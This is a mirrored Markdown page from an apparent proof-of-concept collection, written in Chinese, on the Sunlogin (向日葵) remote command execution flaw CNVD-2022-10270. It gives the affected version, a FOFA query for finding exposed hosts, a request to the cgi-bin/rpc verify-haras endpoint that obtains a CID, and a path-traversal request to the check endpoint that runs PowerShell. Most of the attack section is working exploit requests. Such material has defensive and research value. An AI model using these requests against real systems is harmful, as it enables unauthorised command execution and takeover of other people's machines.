mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-08 20:36:14 +00:00
39 lines
816 B
Markdown
39 lines
816 B
Markdown
# 向日葵 check 远程命令执行漏洞 CNVD-2022-10270
|
||
|
||
## 漏洞描述
|
||
|
||
向日葵通过发送特定的请求获取CID后,可调用 check接口实现远程命令执行,导致服务器权限被获取
|
||
|
||
## 漏洞影响
|
||
|
||
```
|
||
11.0.0.33162
|
||
```
|
||
|
||
## FOFA
|
||
|
||
```
|
||
body="Verification failure"
|
||
```
|
||
|
||
## 漏洞复现
|
||
|
||
向日葵在开启后会默认在 40000-65535 之间开启某端口
|
||
|
||

|
||
|
||
发送请求获取CID
|
||
|
||
```
|
||
/cgi-bin/rpc?action=verify-haras
|
||
```
|
||
|
||

|
||
|
||
使用获取到的 verify_string 作为 cookie的 CID字段,进行命令执行
|
||
|
||
```
|
||
/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig
|
||
```
|
||
|
||
 |